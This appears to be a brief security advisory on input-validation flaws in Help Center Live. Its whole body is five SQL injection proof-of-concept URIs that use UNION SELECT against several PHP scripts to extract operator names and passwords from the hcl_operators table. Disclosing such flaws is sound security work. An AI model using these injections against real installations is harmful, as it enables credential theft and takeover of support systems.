Help Center Live Multiple Input Validation Vulnerabilities

Help Center Live Multiple Input Validation Vulnerabilities

No exploit is required.

The following proof of concept URI demonstrating the SQL injection issues are available:
http://www.example.com/support/faq/index.php?x=f&id=-99'%20UNION%20SELECT%200,
0,operator,password%20FROM%20hcl_operators%20WHERE%201/*

http://www.example.com/support/tt/view.php?tid=-99'%20UNION%20SELECT%200,0,0,
operator,password,0,0,0,0,0%20FROM%20hcl_operators%20WHERE%201/*

http://www.example.com/support/tt/download.php?fid=-99'%20UNION%20SELECT%200,0,0,
password,0,operator,0,0%20FROM%20hcl_operators%20WHERE%20id='1

http://www.example.com/support/lh/icon.php?status=-99' UNION SELECT
password,password FROM hcl_operators WHERE id=1/*

http://www.example.com/support/lh/chat_download.php?fid=-99' UNION
SELECT password,operator,password FROM hcl_operators WHERE id=1/*